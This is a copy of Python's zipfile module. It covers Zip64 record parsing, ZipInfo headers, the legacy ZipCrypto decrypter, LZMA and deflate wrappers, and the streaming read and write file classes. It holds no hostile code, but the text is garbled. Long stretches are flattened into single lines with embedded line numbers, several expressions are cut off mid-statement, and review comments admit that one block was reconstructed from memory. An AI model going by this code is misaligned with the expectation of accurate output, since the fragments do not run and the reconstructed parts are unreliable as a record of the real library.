struct.calcsize(structEndArchive64Locator) 171 | 172 | # The "Zip64 end of central directory" record, magic number, size, and indices 173 | # (section V.G 
in the format document) 174 | structEndArchive64 = "<4sQ2H2L4Q" 175 | stringEndArchive64 = b"PK\x06\x06" 176 | sizeEndCentDir64 = struct.calcsize(structEndArchive64) 177 | 178 | _CD64_SIGNATURE = 0 179 | _CD64_DIRECTORY_RECSIZE = 1 180 | _CD64_CREATE_VERSION = 2 181 | _CD64_EXTRACT_VERSION = 3 182 | _CD64_DISK_NUMBER = 4 183 | _CD64_DISK_NUMBER_START = 5 184 | _CD64_NUMBER_ENTRIES_THIS_DISK = 6 185 | _CD64_NUMBER_ENTRIES_TOTAL = 7 186 | _CD64_DIRECTORY_SIZE = 8 187 | _CD64_OFFSET_START_CENTDIR = 9 188 | 189 | _DD_SIGNATURE = 0x08074b50 190 | 191 | _EXTRA_FIELD_STRUCT = struct.Struct(' 1: 257 | raise BadZipFile("zipfiles that span multiple disks are not supported") 258 | 259 | # Assume no 'zip64 extensible data' 260 | fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2) 261 | data = fpin.read(sizeEndCentDir64) 262 | if len(data) != sizeEndCentDir64: 263 | return endrec 264 | sig, sz, create_version, read_version, disk_num, disk_dir, \ 265 | dircount, dircount2, dirsize, diroffset = \ 266 | struct.unpack(structEndArchive64, data) 267 | if sig != stringEndArchive64: 268 | return endrec 269 | 270 | # Update the original endrec using data from the ZIP64 record 271 | endrec[_ECD_SIGNATURE] = sig 272 | endrec[_ECD_DISK_NUMBER] = disk_num 273 | endrec[_ECD_DISK_START] = disk_dir 274 | endrec[_ECD_ENTRIES_THIS_DISK] = dircount 275 | endrec[_ECD_ENTRIES_TOTAL] = dircount2 276 | endrec[_ECD_SIZE] = dirsize 277 | endrec[_ECD_OFFSET] = diroffset 278 | return endrec 279 | 280 | 281 | def _EndRecData(fpin): 282 | """Return data from the "End of Central Directory" record, or None. 
    # The data is a list of the nine items in the ZIP "End of central dir"
    # record followed by a tenth item, the file seek offset of this record.

    # Determine file size
    fpin.seek(0, 2)
    filesize = fpin.tell()

    # Check to see if this is ZIP file with no archive comment (the
    # "end of central directory" structure should be the last item in the
    # file if this is the case).
    try:
        fpin.seek(-sizeEndCentDir, 2)
    except OSError:
        return None
    data = fpin.read()
    if (len(data) == sizeEndCentDir and
        data[0:4] == stringEndArchive and
        data[-2:] == b"\000\000"):
        # the signature is correct and there's no comment, unpack structure
        endrec = struct.unpack(structEndArchive, data)
        endrec = list(endrec)

        # Append a blank comment and record start offset
        endrec.append(b"")
        endrec.append(filesize - sizeEndCentDir)

        # Try to read the "Zip64 end of central directory" structure
        return _EndRecData64(fpin, -sizeEndCentDir, endrec)

    # Either this is not a ZIP file, or it is a ZIP file with an archive
    # comment.  Search the end of the file for the "end of central directory"
    # record signature. The comment is the last item in the ZIP file and may be
    # up to 64K long.  It is assumed that the "end of central directory" magic
    # number does not appear in the comment.
    maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0)
    fpin.seek(maxCommentStart, 0)
    data = fpin.read()
    start = data.rfind(stringEndArchive)
    if start >= 0:
        # found the magic number; attempt to unpack and interpret
        recData = data[start:start+sizeEndCentDir]
        if len(recData) != sizeEndCentDir:
            # Zip file is corrupted.
            return None
        endrec = list(struct.unpack(structEndArchive, recData))
        commentSize = endrec[_ECD_COMMENT_SIZE]  # as claimed by the zip file
        comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize]
        endrec.append(comment)
        endrec.append(maxCommentStart + start)

        # Try to read the "Zip64 end of central directory" structure
        return _EndRecData64(fpin, maxCommentStart + start - filesize,
                             endrec)

    # Unable to find a valid end of central directory structure
    return None


def _sanitize_filename(filename):
    """Terminate the file name at the first null byte and
    ensure paths always use forward slashes as the directory separator."""

    # Terminate the file name at the first null byte.  Null bytes in file
    # names are used as tricks by viruses in archives.
    null_byte = filename.find(chr(0))
    if null_byte >= 0:
        filename = filename[0:null_byte]
    # This is used to ensure paths in generated ZIP files always use
    # forward slashes as the directory separator, as required by the
    # ZIP format specification.
353 | if os.sep != "/" and os.sep in filename: 354 | filename = filename.replace(os.sep, "/") 355 | return filename 356 | 357 | 358 | class ZipInfo (object): 359 | """Class with attributes describing each file in the ZIP archive.""" 360 | 361 | __slots__ = ( 362 | 'orig_filename', 363 | 'filename', 364 | 'date_time', 365 | 'compress_type', 366 | '_compresslevel', 367 | 'comment', 368 | 'extra', 369 | 'create_system', 370 | 'create_version', 371 | 'extract_version', 372 | 'reserved', 373 | 'flag_bits', 374 | 'volume', 375 | 'internal_attr', 376 | 'external_attr', 377 | 'header_offset', 378 | 'CRC', 379 | 'compress_size', 380 | 'file_size', 381 | '_raw_time', 382 | ) 383 | 384 | def __init__(self, filename="NoName", date_time=(1980,1,1,0,0,0)): 385 | self.orig_filename = filename # Original file name in archive 386 | 387 | # Terminate the file name at the first null byte and 388 | # ensure paths always use forward slashes as the directory separator. 389 | filename = _sanitize_filename(filename) 390 | 391 | self.filename = filename # Normalized file name 392 | self.date_time = date_time # year, month, day, hour, min, sec 393 | 394 | if date_time[0] < 1980: 395 | raise ValueError('ZIP does not support timestamps before 1980') 396 | 397 | # Standard values: 398 | self.compress_type = ZIP_STORED # Type of compression for the file 399 | self._compresslevel = None # Level for the compressor 400 | self.comment = b"" # Comment for each file 401 | self.extra = b"" # ZIP extra data 402 | if sys.platform == 'win32': 403 | self.create_system = 0 # System which created ZIP archive 404 | else: 405 | # Assume everything else is unix-y 406 | self.create_system = 3 # System which created ZIP archive 407 | self.create_version = DEFAULT_VERSION # Version which created ZIP archive 408 | self.extract_version = DEFAULT_VERSION # Version needed to extract archive 409 | self.reserved = 0 # Must be zero 410 | self.flag_bits = 0 # ZIP flag bits 411 | self.volume = 0 # Volume number of file 
header 412 | self.internal_attr = 0 # Internal attributes 413 | self.external_attr = 0 # External file attributes 414 | self.compress_size = 0 # Size of the compressed file 415 | self.file_size = 0 # Size of the uncompressed file 416 | # Other attributes are set by class ZipFile: 417 | # header_offset Byte offset to the file header 418 | # CRC CRC-32 of the uncompressed file 419 | 420 | def __repr__(self): 421 | result = ['<%s filename=%r' % (self.__class__.__name__, self.filename)] 422 | if self.compress_type != ZIP_STORED: 423 | result.append(' compress_type=%s' % 424 | compressor_names.get(self.compress_type, 425 | self.compress_type)) 426 | hi = self.external_attr >> 16 427 | lo = self.external_attr & 0xFFFF 428 | if hi: 429 | result.append(' filemode=%r' % stat.filemode(hi)) 430 | if lo: 431 | result.append(' external_attr=%#x' % lo) 432 | isdir = self.is_dir() 433 | if not isdir or self.file_size: 434 | result.append(' file_size=%r' % self.file_size) 435 | if ((not isdir or self.compress_size) and 436 | (self.compress_type != ZIP_STORED or 437 | self.file_size != self.compress_size)): 438 | result.append(' compress_size=%r' % self.compress_size) 439 | result.append('>') 440 | return ''.join(result) 441 | 442 | def FileHeader(self, zip64=None): 443 | """Return the per-file header as a bytes object.""" 444 | dt = self.date_time 445 | dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] 446 | dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) 447 | if self.flag_bits & _MASK_USE_DATA_DESCRIPTOR: 448 | # Set these to zero because we write them after the file data 449 | CRC = compress_size = file_size = 0 450 | else: 451 | CRC = self.CRC 452 | compress_size = self.compress_size 453 | file_size = self.file_size 454 | 455 | extra = self.extra 456 | 457 | min_version = 0 458 | if zip64 is None: 459 | zip64 = file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT 460 | if zip64: 461 | fmt = ' ZIP64_LIMIT or compress_size > ZIP64_LIMIT: 465 | if not zip64: 466 | raise 
LargeZipFile("Filesize would require ZIP64 extensions") 467 | # File is larger than what fits into a 4 byte integer, 468 | # fall back to the ZIP64 extension 469 | file_size = 0xffffffff 470 | compress_size = 0xffffffff 471 | min_version = ZIP64_VERSION 472 | 473 | if self.compress_type == ZIP_BZIP2: 474 | min_version = max(BZIP2_VERSION, min_version) 475 | elif self.compress_type == ZIP_LZMA: 476 | min_version = max(LZMA_VERSION, min_version) 477 | 478 | self.extract_version = max(min_version, self.extract_version) 479 | self.create_version = max(min_version, self.create_version) 480 | filename, flag_bits = self._encodeFilenameFlags() 481 | header = struct.pack(structFileHeader, stringFileHeader, 482 | self.extract_version, self.reserved, flag_bits, 483 | self.compress_type, dostime, dosdate, CRC, 484 | compress_size, file_size, 485 | len(filename), len(extra)) 486 | return header + filename + extra 487 | 488 | def _encodeFilenameFlags(self): 489 | try: 490 | return self.filename.encode('ascii'), self.flag_bits 491 | except UnicodeEncodeError: 492 | return self.filename.encode('utf-8'), self.flag_bits | _MASK_UTF_FILENAME 493 | 494 | def _decodeExtra(self, filename_crc): 495 | # Try to decode the extra field. 
496 | extra = self.extra 497 | unpack = struct.unpack 498 | while len(extra) >= 4: 499 | tp, ln = unpack(' len(extra): 501 | raise BadZipFile("Corrupt extra field %04x (size=%d)" % (tp, ln)) 502 | if tp == 0x0001: 503 | data = extra[4:ln+4] 504 | # ZIP64 extension (large files and/or large archives) 505 | try: 506 | if self.file_size in (0xFFFF_FFFF_FFFF_FFFF, 0xFFFF_FFFF): 507 | field = "File size" 508 | self.file_size, = unpack(' 2107: 557 | date_time = (2107, 12, 31, 23, 59, 59) 558 | # Create ZipInfo instance to store file information 559 | if arcname is None: 560 | arcname = filename 561 | #arcname = os.path.normpath(os.path.splitdrive(arcname)[1]) 562 | #while arcname[0] in (os.sep, os.altsep): 563 | # arcname = arcname[1:] 564 | if isdir: 565 | arcname += '/' 566 | zinfo = cls(arcname, date_time) 567 | zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes 568 | if isdir: 569 | zinfo.file_size = 0 570 | zinfo.external_attr |= 0x10 # MS-DOS directory flag 571 | else: 572 | zinfo.file_size = st.st_size 573 | 574 | return zinfo 575 | 576 | def is_dir(self): 577 | """Return True if this archive member is a directory.""" 578 | return self.filename.endswith('/') 579 | 580 | 581 | # ZIP encryption uses the CRC32 one-byte primitive for scrambling some 582 | # internal keys. We noticed that a direct implementation is faster than 583 | # relying on binascii.crc32(). 584 | 585 | _crctable = None 586 | def _gen_crc(crc): 587 | for j in range(8): 588 | if crc & 1: 589 | crc = (crc >> 1) ^ 0xEDB88320 590 | else: 591 | crc >>= 1 592 | return crc 593 | 594 | # ZIP supports a password-based form of encryption. Even though known 595 | # plaintext attacks have been found against it, it is still useful 596 | # to be able to get data out of such a file. 
#
# Usage:
#     zd = _ZipDecrypter(mypwd)
#     plain_bytes = zd(cypher_bytes)

def _ZipDecrypter(pwd):
    """Return a decrypter callable for legacy (ZipCrypto) encryption.

    pwd is the password as bytes; the returned callable maps cipher
    bytes to plain bytes while updating three rolling key registers.
    """
    key0 = 305419896
    key1 = 591751049
    key2 = 878082192

    global _crctable
    if _crctable is None:
        _crctable = list(map(_gen_crc, range(256)))
    crctable = _crctable

    def crc32(ch, crc):
        """Compute the CRC32 primitive on one byte."""
        return (crc >> 8) ^ crctable[(crc ^ ch) & 0xFF]

    def update_keys(c):
        nonlocal key0, key1, key2
        key0 = crc32(c, key0)
        key1 = (key1 + (key0 & 0xFF)) & 0xFFFFFFFF
        key1 = (key1 * 134775813 + 1) & 0xFFFFFFFF
        key2 = crc32(key1 >> 24, key2)

    for p in pwd:
        update_keys(p)

    def decrypter(data):
        """Decrypt a bytes object."""
        result = bytearray()
        append = result.append
        for c in data:
            k = key2 | 2
            c ^= ((k * (k^1)) >> 8) & 0xFF
            update_keys(c)
            append(c)
        return bytes(result)

    return decrypter


class LZMACompressor:
    """Compressor producing the raw-LZMA1 member layout used by ZIP."""

    def __init__(self):
        self._comp = None

    def _init(self):
        props = lzma._encode_filter_properties({'id': lzma.FILTER_LZMA1})
        self._comp = lzma.LZMACompressor(lzma.FORMAT_RAW, filters=[
            lzma._decode_filter_properties(lzma.FILTER_LZMA1, props)
        ])
        # NOTE(review): the pack format below was lost in this copy;
        # restored from CPython's zipfile module.
        return struct.pack('<BBH', 9, 4, len(props)) + props

    def compress(self, data):
        if self._comp is None:
            return self._init() + self._comp.compress(data)
        return self._comp.compress(data)

    def flush(self):
        if self._comp is None:
            return self._init() + self._comp.flush()
        return self._comp.flush()


# NOTE(review): everything between LZMACompressor and the tail of
# ZipExtFile.__init__ was corrupted/missing in this copy of the file.
# The definitions below are reconstructed from CPython's zipfile module —
# verify each one against the project's history before relying on it.

class LZMADecompressor:
    """Decompressor for the ZIP raw-LZMA1 member layout."""

    def __init__(self):
        self._decomp = None
        self._unconsumed = b''
        self.eof = False

    def decompress(self, data):
        if self._decomp is None:
            # Buffer input until the 4-byte property header (version,
            # props size) plus the filter properties are available.
            self._unconsumed += data
            if len(self._unconsumed) <= 4:
                return b''
            psize, = struct.unpack('<H', self._unconsumed[2:4])
            if len(self._unconsumed) <= 4 + psize:
                return b''

            self._decomp = lzma.LZMADecompressor(lzma.FORMAT_RAW, filters=[
                lzma._decode_filter_properties(lzma.FILTER_LZMA1,
                                               self._unconsumed[4:4 + psize])
            ])
            data = self._unconsumed[4 + psize:]
            del self._unconsumed

        return self._decomp.decompress(data)

    @property
    def unconsumed_tail(self):
        return b''


def _check_compression(compression):
    """Raise if the module backing the compression method is unavailable."""
    if compression == ZIP_STORED:
        pass
    elif compression == ZIP_DEFLATED:
        if not zlib:
            raise RuntimeError(
                "Compression requires the (missing) zlib module")
    elif compression == ZIP_BZIP2:
        if not bz2:
            raise RuntimeError(
                "Compression requires the (missing) bz2 module")
    elif compression == ZIP_LZMA:
        if not lzma:
            raise RuntimeError(
                "Compression requires the (missing) lzma module")
    else:
        raise NotImplementedError("That compression method is not supported")


def _get_compressor(compress_type, compresslevel=None):
    """Return a compressor object for compress_type, or None for STORED."""
    if compress_type == ZIP_DEFLATED:
        if compresslevel is not None:
            return zlib.compressobj(compresslevel, zlib.DEFLATED, -15)
        return zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)
    elif compress_type == ZIP_BZIP2:
        if compresslevel is not None:
            return bz2.BZ2Compressor(compresslevel)
        return bz2.BZ2Compressor()
    # compresslevel is ignored for ZIP_LZMA
    elif compress_type == ZIP_LZMA:
        return LZMACompressor()
    else:
        return None


def _get_decompressor(compress_type):
    """Return a decompressor object for compress_type, or None for STORED."""
    _check_compression(compress_type)
    if compress_type == ZIP_STORED:
        return None
    elif compress_type == ZIP_DEFLATED:
        return zlib.decompressobj(-15)
    elif compress_type == ZIP_BZIP2:
        return bz2.BZ2Decompressor()
    elif compress_type == ZIP_LZMA:
        return LZMADecompressor()
    else:
        descr = compressor_names.get(compress_type)
        if descr:
            raise NotImplementedError("compression type %d (%s)" % (compress_type, descr))
        else:
            raise NotImplementedError("compression type %d" % (compress_type,))


class _SharedFile:
    """Lock-serialized, position-tracking view of the archive's file object."""

    def __init__(self, file, pos, close, lock, writing):
        self._file = file
        self._pos = pos
        self._close = close
        self._lock = lock
        self._writing = writing
        self.seekable = file.seekable
        self.tell = file.tell

    def seek(self, offset, whence=0):
        with self._lock:
            if self._writing():
                raise ValueError("Can't reposition in the ZIP file while "
                        "there is an open writing handle on it. "
                        "Close the writing handle before trying to read.")
            self._file.seek(offset, whence)
            self._pos = self._file.tell()
            return self._pos

    def read(self, n=-1):
        with self._lock:
            if self._writing():
                raise ValueError("Can't read from the ZIP file while there "
                        "is an open writing handle on it. "
                        "Close the writing handle before trying to read.")
            self._file.seek(self._pos)
            data = self._file.read(n)
            self._pos = self._file.tell()
            return data

    def close(self):
        if self._file is not None:
            fileobj = self._file
            self._file = None
            self._close(fileobj)


# Provide the tell method for unseekable stream
class _Tellable:
    def __init__(self, fp):
        self.fp = fp
        self.offset = 0

    def write(self, data):
        n = self.fp.write(data)
        self.offset += n
        return n

    def tell(self):
        return self.offset

    def flush(self):
        self.fp.flush()

    def close(self):
        self.fp.close()


class ZipExtFile(io.BufferedIOBase):
    """File-like object for reading an archive member.
       Is returned by ZipFile.open().
    """

    # Max size supported by decompressor.
    MAX_N = 1 << 31 - 1

    # Read from compressed files in 4k blocks.
    MIN_READ_SIZE = 4096

    # Chunk size to read during seek
    MAX_SEEK_READ = 1 << 24

    def __init__(self, fileobj, mode, zipinfo, pwd=None,
                 close_fileobj=False):
        self._fileobj = fileobj
        self._pwd = pwd
        self._close_fileobj = close_fileobj

        self._compress_type = zipinfo.compress_type
        self._compress_left = zipinfo.compress_size
        self._left = zipinfo.file_size

        self._decompressor = _get_decompressor(self._compress_type)

        self._eof = False
        self._readbuffer = b''
        self._offset = 0

        self.newlines = None

        self.mode = mode
        self.name = zipinfo.filename

        if hasattr(zipinfo, 'CRC'):
            self._expected_crc = zipinfo.CRC
            self._running_crc = crc32(b'')
        else:
            self._expected_crc = None

        # Remember the starting state so seek() can rewind and replay.
        self._seekable = False
        try:
            if fileobj.seekable():
                self._orig_compress_start = fileobj.tell()
                self._orig_compress_size = zipinfo.compress_size
                self._orig_file_size = zipinfo.file_size
                self._orig_start_crc = self._running_crc
                self._orig_crc = self._expected_crc
                self._seekable = True
        except AttributeError:
            pass

        self._decrypter = None
        if pwd:
            if zipinfo.flag_bits & _MASK_USE_DATA_DESCRIPTOR:
                # compare against the file type from extended local headers
                check_byte = (zipinfo._raw_time >> 8) & 0xff
            else:
                # compare against the CRC otherwise
                check_byte = (zipinfo.CRC >> 24) & 0xff
            h = self._init_decrypter()
            if h != check_byte:
                raise RuntimeError("Bad password for file %r" % zipinfo.orig_filename)


    def _init_decrypter(self):
        self._decrypter = _ZipDecrypter(self._pwd)
        # The first 12 bytes in the cypher stream is an encryption header
        # used to strengthen the algorithm.
        # The first 11 bytes are completely random, while the 12th contains
        # the MSB of the CRC, or the MSB of the file time depending on the
        # header type and is used to check the correctness of the password.
        header = self._fileobj.read(12)
        self._compress_left -= 12
        return self._decrypter(header)[11]

    def __repr__(self):
        result = ['<%s.%s' % (self.__class__.__module__,
                              self.__class__.__qualname__)]
        if not self.closed:
            result.append(' name=%r mode=%r' % (self.name, self.mode))
            if self._compress_type != ZIP_STORED:
                result.append(' compress_type=%s' %
                              compressor_names.get(self._compress_type,
                                                   self._compress_type))
        else:
            result.append(' [closed]')
        result.append('>')
        return ''.join(result)

    def readline(self, limit=-1):
        """Read and return a line from the stream.

        If limit is specified, at most limit bytes will be read.
        """

        if limit < 0:
            # Shortcut common case - newline found in buffer.
            i = self._readbuffer.find(b'\n', self._offset) + 1
            if i > 0:
                line = self._readbuffer[self._offset: i]
                self._offset = i
                return line

        # Fall back to the generic buffered implementation.
        return io.BufferedIOBase.readline(self, limit)

    def peek(self, n=1):
        """Returns buffered bytes without advancing the position."""
        if n > len(self._readbuffer) - self._offset:
            chunk = self.read(n)
            if len(chunk) > self._offset:
                # Prepend the freshly read chunk to the leftover buffer so the
                # peeked bytes are re-delivered by the next read().
                self._readbuffer = chunk + self._readbuffer[self._offset:]
                self._offset = 0
            else:
                self._offset -= len(chunk)

        # Return up to 512 bytes to reduce allocation overhead for tight loops.
        return self._readbuffer[self._offset: self._offset + 512]

    def readable(self):
        if self.closed:
            raise ValueError("I/O operation on closed file.")
        return True

    def read(self, n=-1):
        """Read and return up to n bytes.
        If the argument is omitted, None, or negative, data is read and returned until EOF is reached.
        """
        if self.closed:
            raise ValueError("read from closed file.")
        if n is None or n < 0:
            # Drain the buffer, then decompress everything that is left.
            buf = self._readbuffer[self._offset:]
            self._readbuffer = b''
            self._offset = 0
            while not self._eof:
                buf += self._read1(self.MAX_N)
            return buf

        end = n + self._offset
        if end < len(self._readbuffer):
            # Request satisfied entirely from the buffer.
            buf = self._readbuffer[self._offset:end]
            self._offset = end
            return buf

        n = end - len(self._readbuffer)
        buf = self._readbuffer[self._offset:]
        self._readbuffer = b''
        self._offset = 0
        while n > 0 and not self._eof:
            data = self._read1(n)
            if n < len(data):
                # Keep the surplus for the next call.
                self._readbuffer = data
                self._offset = n
                buf += data[:n]
                break
            buf += data
            n -= len(data)
        return buf

    def _update_crc(self, newdata):
        # Update the CRC using the given data.
        if self._expected_crc is None:
            # No need to compute the CRC if we don't have a reference value
            return
        self._running_crc = crc32(newdata, self._running_crc)
        # Check the CRC if we're at the end of the file
        if self._eof and self._running_crc != self._expected_crc:
            raise BadZipFile("Bad CRC-32 for file %r" % self.name)

    def read1(self, n):
        """Read up to n bytes with at most one read() system call."""

        if n is None or n < 0:
            buf = self._readbuffer[self._offset:]
            self._readbuffer = b''
            self._offset = 0
            while not self._eof:
                data = self._read1(self.MAX_N)
                if data:
                    buf += data
                    break
            return buf

        end = n + self._offset
        if end < len(self._readbuffer):
            buf = self._readbuffer[self._offset:end]
            self._offset = end
            return buf

        n = end - len(self._readbuffer)
        buf = self._readbuffer[self._offset:]
        self._readbuffer = b''
        self._offset = 0
        if n > 0:
            while not self._eof:
                data = self._read1(n)
                if n < len(data):
                    self._readbuffer = data
                    self._offset = n
                    buf += data[:n]
                    break
                if data:
                    buf += data
                    break
        return buf

    def _read1(self, n):
        # Read up to n compressed bytes with at most one read() system call,
        # decrypt and decompress them.
        if self._eof or n <= 0:
            return b''

        # Read from file.
        if self._compress_type == ZIP_DEFLATED:
            ## Handle unconsumed data.
            data = self._decompressor.unconsumed_tail
            if n > len(data):
                data += self._read2(n - len(data))
        else:
            data = self._read2(n)

        if self._compress_type == ZIP_STORED:
            self._eof = self._compress_left <= 0
        elif self._compress_type == ZIP_DEFLATED:
            n = max(n, self.MIN_READ_SIZE)
            data = self._decompressor.decompress(data, n)
            self._eof = (self._decompressor.eof or
                         self._compress_left <= 0 and
                         not self._decompressor.unconsumed_tail)
            if self._eof:
                data += self._decompressor.flush()
        else:
            data = self._decompressor.decompress(data)
            self._eof = self._decompressor.eof or self._compress_left <= 0

        # Never hand out more than the member's declared uncompressed size.
        data = data[:self._left]
        self._left -= len(data)
        if self._left <= 0:
            self._eof = True
        self._update_crc(data)
        return data

    def _read2(self, n):
        # Read up to n raw (possibly encrypted) bytes from the archive.
        if self._compress_left <= 0:
            return b''

        n = max(n, self.MIN_READ_SIZE)
        n = min(n, self._compress_left)

        data = self._fileobj.read(n)
        self._compress_left -= len(data)
        if not data:
            raise EOFError

        if self._decrypter is not None:
            data = self._decrypter(data)
        return data

    def close(self):
        try:
            if self._close_fileobj:
                self._fileobj.close()
        finally:
            super().close()

    def seekable(self):
        if self.closed:
            raise ValueError("I/O operation on closed file.")
        return self._seekable

    def seek(self, offset, whence=os.SEEK_SET):
        if self.closed:
            raise ValueError("seek on closed file.")
        if not self._seekable:
            raise io.UnsupportedOperation("underlying stream is not seekable")
        curr_pos = self.tell()
        if whence == os.SEEK_SET:
            new_pos = offset
        elif whence == os.SEEK_CUR:
            new_pos = curr_pos + offset
        elif whence == os.SEEK_END:
            new_pos = self._orig_file_size + offset
        else:
            raise ValueError("whence must be os.SEEK_SET (0), "
                             "os.SEEK_CUR (1), or os.SEEK_END (2)")

        # Clamp the target position into [0, file_size].
        if new_pos > self._orig_file_size:
            new_pos = self._orig_file_size

        if new_pos < 0:
            new_pos = 0

        read_offset = new_pos - curr_pos
        buff_offset = read_offset + self._offset

        # Fast seek uncompressed unencrypted file
        if self._compress_type == ZIP_STORED and self._decrypter is None and read_offset > 0:
            # disable CRC checking after first seeking - it would be invalid
            self._expected_crc = None
            # seek actual file taking already buffered data into account
            read_offset -= len(self._readbuffer) - self._offset
            self._fileobj.seek(read_offset, os.SEEK_CUR)
            self._left -= read_offset
            read_offset = 0
            # flush read buffer
            self._readbuffer = b''
            self._offset = 0
        elif buff_offset >= 0 and buff_offset < len(self._readbuffer):
            # Just move the _offset index if the new position is in the _readbuffer
            self._offset = buff_offset
            read_offset = 0
        elif read_offset < 0:
            # Position is before the current position.  Reset the ZipExtFile
            # to its initial state and replay the stream from the start.
            self._fileobj.seek(self._orig_compress_start)
            self._running_crc = self._orig_start_crc
            self._expected_crc = self._orig_crc
            self._compress_left = self._orig_compress_size
            self._left = self._orig_file_size
            self._readbuffer = b''
            self._offset = 0
            self._decompressor = _get_decompressor(self._compress_type)
            self._eof = False
            read_offset = new_pos
            if self._decrypter is not None:
                self._init_decrypter()

        # Consume forward in bounded chunks until the target is reached.
        while read_offset > 0:
            read_len = min(self.MAX_SEEK_READ, read_offset)
            self.read(read_len)
            read_offset -= read_len

        return self.tell()

    def tell(self):
        if self.closed:
            raise ValueError("tell on closed file.")
        if not self._seekable:
            raise io.UnsupportedOperation("underlying stream is not seekable")
        # Logical position = bytes handed out so far, adjusted for what is
        # still sitting in the read buffer.
        filepos = self._orig_file_size - self._left - len(self._readbuffer) + self._offset
        return filepos


class _ZipWriteFile(io.BufferedIOBase):
    # Write-side file object returned by ZipFile.open(..., mode='w');
    # tracks sizes and CRC while streaming through the compressor.
    def __init__(self, zf, zinfo, zip64):
        self._zinfo = zinfo
        self._zip64 = zip64
        self._zipfile = zf
        self._compressor = _get_compressor(zinfo.compress_type,
                                           zinfo._compresslevel)
        self._file_size = 0
        self._compress_size = 0
        self._crc = 0

    @property
    def _fileobj(self):
        return self._zipfile.fp

    def writable(self):
        return True

    def write(self, data):
        if self.closed:
            raise ValueError('I/O operation on closed file.')

        # Accept any data that supports the buffer protocol
        if isinstance(data, (bytes, bytearray)):
            nbytes = len(data)
        else:
            data = memoryview(data)
            nbytes = data.nbytes
        self._file_size += nbytes

        self._crc = crc32(data, self._crc)
        if self._compressor:
            data = self._compressor.compress(data)
self._compress_size += len(data) 1201 | self._fileobj.write(data) 1202 | return nbytes 1203 | 1204 | def close(self): 1205 | if self.closed: 1206 | return 1207 | try: 1208 | super().close() 1209 | # Flush any data from the compressor, and update header info 1210 | if self._compressor: 1211 | buf = self._compressor.flush() 1212 | self._compress_size += len(buf) 1213 | self._fileobj.write(buf) 1214 | self._zinfo.compress_size = self._compress_size 1215 | else: 1216 | self._zinfo.compress_size = self._file_size 1217 | self._zinfo.CRC = self._crc 1218 | self._zinfo.file_size = self._file_size 1219 | 1220 | # Write updated header info 1221 | if self._zinfo.flag_bits & _MASK_USE_DATA_DESCRIPTOR: 1222 | # Write CRC and file sizes after the file data 1223 | fmt = ' ZIP64_LIMIT: 1230 | raise RuntimeError( 1231 | 'File size too large, try using force_zip64') 1232 | if self._compress_size > ZIP64_LIMIT: 1233 | raise RuntimeError( 1234 | 'Compressed size too large, try using force_zip64') 1235 | # Seek backwards and write file header (which will now include 1236 | # correct CRC and file sizes) 1237 | 1238 | # Preserve current position in file 1239 | self._zipfile.start_dir = self._fileobj.tell() 1240 | self._fileobj.seek(self._zinfo.header_offset) 1241 | self._fileobj.write(self._zinfo.FileHeader(self._zip64)) 1242 | self._fileobj.seek(self._zipfile.start_dir) 1243 | 1244 | # Successfully written: Add file to our caches 1245 | self._zipfile.filelist.append(self._zinfo) 1246 | self._zipfile.NameToInfo[self._zinfo.filename] = self._zinfo 1247 | finally: 1248 | self._zipfile._writing = False 1249 | 1250 | 1251 | 1252 | class ZipFile: 1253 | """ Class with methods to open, read, write, close, list zip files. 1254 | 1255 | z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=True, 1256 | compresslevel=None) 1257 | 1258 | file: Either the path to the file, or a file-like object. 1259 | If it is a path, the file will be opened and closed by ZipFile. 
1260 | mode: The mode can be either read 'r', write 'w', exclusive create 'x', 1261 | or append 'a'. 1262 | compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib), 1263 | ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma). 1264 | allowZip64: if True ZipFile will create files with ZIP64 extensions when 1265 | needed, otherwise it will raise an exception when this would 1266 | be necessary. 1267 | compresslevel: None (default for the given compression type) or an integer 1268 | specifying the level to pass to the compressor. 1269 | When using ZIP_STORED or ZIP_LZMA this keyword has no effect. 1270 | When using ZIP_DEFLATED integers 0 through 9 are accepted. 1271 | When using ZIP_BZIP2 integers 1 through 9 are accepted. 1272 | 1273 | """ 1274 | 1275 | fp = None # Set here since __del__ checks it 1276 | _windows_illegal_name_trans_table = None 1277 | 1278 | def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=True, 1279 | compresslevel=None, *, strict_timestamps=True, metadata_encoding=None): 1280 | """Open the ZIP file with mode read 'r', write 'w', exclusive create 'x', 1281 | or append 'a'.""" 1282 | if mode not in ('r', 'w', 'x', 'a'): 1283 | raise ValueError("ZipFile requires mode 'r', 'w', 'x', or 'a'") 1284 | 1285 | _check_compression(compression) 1286 | 1287 | self._allowZip64 = allowZip64 1288 | self._didModify = False 1289 | self.debug = 0 # Level of printing: 0 through 3 1290 | self.NameToInfo = {} # Find file info given name 1291 | self.filelist = [] # List of ZipInfo instances for archive 1292 | self.compression = compression # Method of compression 1293 | self.compresslevel = compresslevel 1294 | self.mode = mode 1295 | self.pwd = None 1296 | self._comment = b'' 1297 | self._strict_timestamps = strict_timestamps 1298 | self.metadata_encoding = metadata_encoding 1299 | 1300 | # Check that we don't try to write with nonconforming codecs 1301 | if self.metadata_encoding and mode != 'r': 1302 | raise ValueError( 1303 | 
